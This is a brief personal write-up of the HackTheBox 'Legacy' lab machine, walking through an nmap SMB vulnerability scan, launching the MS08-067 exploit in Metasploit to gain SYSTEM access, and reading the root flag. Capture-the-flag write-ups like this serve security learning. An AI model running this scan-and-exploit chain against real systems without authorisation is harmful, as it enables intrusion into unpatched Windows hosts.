Simon McCabe

Pentest+. WAPT. OSCP. OSWP. PGCert. BSc. Linux+. Security+.

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...Legacy Writeup...


1. Enumeration

Legacy was my first HackTheBox …box. It’s a super easy one to get you into the swing of things. This will be a short writeup on what I did to pown it.

I ran a basic nmap scan (sV = service version(s)):


2. Nmap's NSE (Further enum)

I tried testing smb first, using a guest account to see if it has a password. Next up I honed in on the ports with an nmap script:

nmap -script smb-vuln -p 139,445

Running this Nmap scan looking for issues with SMB resulted in a finding for ms08-067:


3. Getting SYSTEM Access

I decided to go with the MS08-067 exploit and opened it up in metasploit:

Search MS08-067

    Use 0

    Set RHOSTS


So now, I was running as SYSTEM but I couldn’t run various commands e.g whoami. So I decided to upload it from my local machine:

si@kali:~$ locate whoami.exe


I ran the following command:

Upload /usr/share/windows-resources/binaries/whoami.exe

I could now run the command(s) I wanted. I figured I should do this to feel "complete". Next up, was reading the flag:

Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  09:18       DIR          .

16/03/2017  09:18       DIR          ..

16/03/2017  09:18                   32 root.txt

1 File(s)             32 bytes

2 Dir(s)   6.484.148.224 bytes free

C:\Documents and Settings\Administrator\Desktop>more root.txt

more root.txt

***hash removed***

And that was that. First box, done!

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